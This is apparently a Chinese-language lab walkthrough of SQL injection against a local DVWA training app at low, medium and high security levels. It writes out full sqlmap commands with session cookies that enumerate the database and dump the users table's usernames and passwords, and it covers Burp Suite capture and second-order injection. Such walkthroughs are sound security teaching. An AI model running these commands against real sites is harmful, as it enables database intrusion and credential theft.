一、low级别
1、进入dvwa界面输入1,点击Submit,得到链接
http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#

2、我们用sqlmap进行爆破
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#"
我们可以看到需要跳转到login的页面,所以,认为这里是需要cookie的。

3、我们查看cookie后将它添加进去
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low"

4、查询数据库
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -dbs

5、查看dvwa数据库的表
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -D dvwa -tables

6、查看表中的字段名
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -D dvwa -T users --columns

7、获取字段的信息
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -D dvwa -T users -C user,password --dump

二、Medium级别
1、我们输入1,点击Sumbit后发现URL没有改变

2、我们利用burpsuit抓包分析, 来查看post方式提交的数据

3、 由于这里是使用 post 方式进行传输的,所以我们这里需要使用 --data 参数把数据引入过来
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" --dbs 查看数据库

4、查看dvwa数据库下的表
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -tables

5、查看字段名
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -T users --columns

6、获取字段中的信息
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -T users -C user,password --dump

三、High级别
1、首先我们注意到这个页面,点击之后会跳转到另外一个页面,所以这个如果想使用sqlmap进行爆破,我们还需要引入一个知识点(参考别人的博客得到)
–second-order(二阶sql注入)
有些时候注入点输入的数据看返回结果的时候并不是当前的页面,而是另外的一个页面,这时候就需要你指定到哪个页面获取响应判断真假。
-–second-order后面跟一个判断页面的URL地址。 (来自简书 作者 m3lon)

2、 我们利用burpsuite进行抓包,因为这里无法在页面上获取 post 或者 get 的值。

3、我们发现获取到的数据和Medium类似,我们利用sqlmap进行注入
sqlmap.py -u "localhost/dvwa-master/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=high; " --second-url "http://localhost/dvwa-master/vulnerabilities/sqli/" -dbs
4、和low级别,medium级别过程一样,我们同样可以获取到数据
sqlmap.py -u "localhost/dvwa-master/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=high; " --second-url "http://localhost/dvwa-master/vulnerabilities/sqli/" -D dvwa -T users -C user,password --dump
